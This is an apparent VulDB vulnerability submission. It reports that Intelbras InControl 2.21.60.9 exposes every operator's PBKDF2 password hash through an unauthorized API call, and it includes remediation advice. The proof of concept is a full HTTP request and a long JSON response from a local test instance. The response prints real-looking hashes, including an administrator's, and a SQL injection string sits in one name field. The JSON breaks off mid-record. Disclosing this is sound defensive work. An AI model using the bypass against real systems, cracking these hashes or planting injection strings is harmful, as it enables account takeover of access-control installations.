Submit #579544: Intelbras InControl 2.21.60.9 Information Disclosure

Title: Intelbras InControl 2.21.60.9 Information Disclosure
Description: InControl discloses the password hashes of every operator account through its REST API. The application has three user roles: Admin, Recepcionista and Porteiro. A user of any role can issue an authenticated GET request to the "/v1/operador/" endpoint, which lists every user registered in the application. The endpoint returns a JSON object that contains, for each user, the id, username, password (hashed), e-mail address and the group/permission assignments, among other fields. The rule that only administrators may list users is enforced only in the frontend: the API performs no server-side authorization check for this operation (broken function-level authorization), so the frontend restriction is bypassed simply by calling the API directly with any valid JWT. Impact notes: the hashes use the `pbkdf2_sha256$150000$<salt>$<hash>` encoding, which matches Django's default PBKDF2 password hasher (salted PBKDF2-HMAC-SHA256, 150,000 iterations). They cannot be replayed for login, but they can be attacked offline with a password cracker, so any weak operator password is recoverable. Because the response also states which accounts belong to the "Administrador" group (see the "admin2" entry below), an attacker holding a low-privilege account can pick exactly the administrator hashes to target. The `Allow: GET, POST, DELETE, HEAD, OPTIONS` response header shows that the same resource accepts write operations; whether those are also missing a server-side authorization check is not shown here and should be verified. The wildcard `Access-Control-Allow-Origin: *` is not what makes this exploitable (the attacker still needs a valid JWT in the Authorization header), but it should be tightened as well. Remediation: enforce the role check on the server for this endpoint and, independently of that, exclude the `password` field (and other sensitive fields) from the serializer so that hashes are never returned to any client, including administrators. Here is an example of the GET request made with Recepcionista privileges (a role that, in the frontend, has no permission to list users):
GET /v1/operador/ HTTP/1.1
Host: localhost:4441
Authorization: JWT eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.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.RyGjsE61f-d4QE6OWMCyp7Px_DjOEYMhmSGPIiCJzcc
Accept-Language: pt-BR,pt;q=0.9
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Origin: https://localhost:4445
Referer: https://localhost:4445/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
And here is the corresponding HTTP response, which discloses the password hashes:
HTTP/1.1 200 OK
Date: Fri, 16 May 2025 19:02:07 GMT
Server: Apache/2.4.62 (Win32) OpenSSL/3.1.6 mod_wsgi/4.7.1 Python/3.7
Vary: Accept,Origin,Cookie
Allow: GET, POST, DELETE, HEAD, OPTIONS
Content-Length: 40484
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json

{"message":null,"data":[{"id":3,"pessoa":{"id":5,"nome_completo":"arnaldo","email":"[email 
protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":3,"username":"cesar","password":"pbkdf2_sha256$150000$O4xokjpfyafm$L1/My9lbtYx/dcJTOW45QaC2N6qWf2KtIScfaA6FCV0=","groups":{"id":3,"name":"Recepcao","permissions":[{"id":268,"codename":"view_controleremoto","content_type":{"id":67,"app_label":"credencial","model":"controleremoto"}},{"id":249,"codename":"add_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":250,"codename":"change_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":251,"codename":"delete_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":252,"codename":"view_historicalbiometriadigital","content_type":{"id":63,"app_label":"credencial","model":"historicalbiometriadigital"}},{"id":181,"codename":"add_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":182,"codename":"change_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":183,"codename":"delete_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":184,"codename":"view_historicaleventooperador","content_type":{"id":46,"app_label":"evento_operador","model":"historicaleventooperador"}},{"id":297,"codename":"add_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":298,"codename":"change_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":299,"codename":"delete_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_aces
so","model":"historicalgrupopontosacesso"}},{"id":300,"codename":"view_historicalgrupopontosacesso","content_type":{"id":75,"app_label":"grupo_pontos_acesso","model":"historicalgrupopontosacesso"}},{"id":117,"codename":"add_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":118,"codename":"change_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":119,"codename":"delete_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":120,"codename":"view_campospersonalizados","content_type":{"id":30,"app_label":"usuario","model":"campospersonalizados"}},{"id":129,"codename":"add_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":130,"codename":"change_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":131,"codename":"delete_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}},{"id":132,"codename":"view_usersgroup","content_type":{"id":33,"app_label":"usuario","model":"usersgroup"}}]},"is_active":true,"is_superuser":false}},{"id":2,"pessoa":{"id":4,"nome_completo":"' OR '1'='1'--","email":"[email 
protected]","telefone_celular":null,"telefone_residencial":null,"grupo":null,"imagem":null,"empresa":null,"tem_pendencias":false},"user":{"id":2,"username":"admin2","password":"pbkdf2_sha256$150000$7iR10NcRJoQY$ccO4sUbudTm2Qh+Lq66Thh1YQqvkBTOk8xxCaLugQ3E=","groups":{"id":1,"name":"Administrador","permissions":[{"id":37,"codename":"add_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":38,"codename":"change_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":39,"codename":"delete_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":40,"codename":"view_acaoevento","content_type":{"id":10,"app_label":"acoes_eventos","model":"acaoevento"}},{"id":385,"codename":"add_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":386,"codename":"change_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":387,"codename":"delete_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":388,"codename":"view_alertasonoro","content_type":{"id":97,"app_label":"alerta_sonoro","model":"alertasonoro"}},{"id":45,"codename":"add_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":46,"codename":"change_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":47,"codename":"delete_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":48,"codename":"view_antipassbackdispositivo","content_type":{"id":12,"app_label":"antipassback","model":"antipassbackdispositivo"}},{"id":53,"codename":"add_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":54,"codename":"change_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":55,"codename
":"delete_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":56,"codename":"view_area","content_type":{"id":14,"app_label":"area","model":"area"}},{"id":49,"codename":"add_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":50,"codename":"change_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":51,"codename":"delete_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":52,"codename":"view_historicalarea","content_type":{"id":13,"app_label":"area","model":"historicalarea"}},{"id":321,"codename":"add_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":322,"codename":"change_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":323,"codename":"delete_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":324,"codename":"view_arquivo","content_type":{"id":81,"app_label":"arquivo","model":"arquivo"}},{"id":345,"codename":"add_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":346,"codename":"change_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":347,"codename":"delete_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":348,"codename":"view_camera","content_type":{"id":87,"app_label":"camera","model":"camera"}},{"id":354,"codename":"change_progressocomunicacao","content_type":{"id":89,"app_label":"comunicacao_progress","model":"progressocomunicacao"}},{"id":261,"codename":"add_assusersdkdispositivosdk","content_type":{"id":66,"app_label":"credencial","model":"assusersdkdispositivosdk"}},{"id":262,
Source: https://localhost:4441/v1/operador/ (local test instance; the affected endpoint path is /v1/operador/)
User: lorenzomoulin (UID 33175)
Submission: 05/16/2025 21:07 (11 months ago)
Moderation: 08/04/2025 07:41 (3 months later)
Status: Accepted
VulDB entry: 318641 [Intelbras InControl 2.21.60.9 JSON Endpoint /v1/operador/ information disclosure]
Points: 20
